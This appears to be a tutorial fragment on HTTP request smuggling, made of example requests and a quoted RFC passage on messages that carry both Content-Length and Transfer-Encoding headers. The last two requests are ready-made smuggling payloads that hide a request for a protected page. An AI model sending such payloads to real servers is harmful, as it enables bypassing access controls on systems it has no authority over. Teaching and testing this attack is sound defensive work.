on 13-Apr-2023 05:00
POST /login.php HTTP/1.1
Host: www.example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
user=test&password=password123
POST /login.php HTTP/1.1
Host: www.example.com
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked
1E
user=test&password=password123
0
A sender MUST NOT send a Content-Length header field in any message
that contains a Transfer-Encoding header field.
If a message is received with both a Transfer-Encoding and a
Content-Length header field, the Transfer-Encoding overrides the
Content-Length. Such a message might indicate an attempt to
perform request smuggling (Section 9.5) or response splitting
(Section 9.4) and ought to be handled as an error. A sender MUST
remove the received Content-Length field prior to forwarding such
a message downstream.
POST /login.php HTTP/1.1
Host: vulnerable.example.com
Content-Length: 41
Transfer-Encoding: chunked
0
GET /protectedresource.html HTTP/1.1
POST /login.php HTTP/1.1
Host: vulnerable.example.com
Content-Length: 4
Transfer-Encoding: chunked
24
GET /protectedresource.html HTTP/1.0
0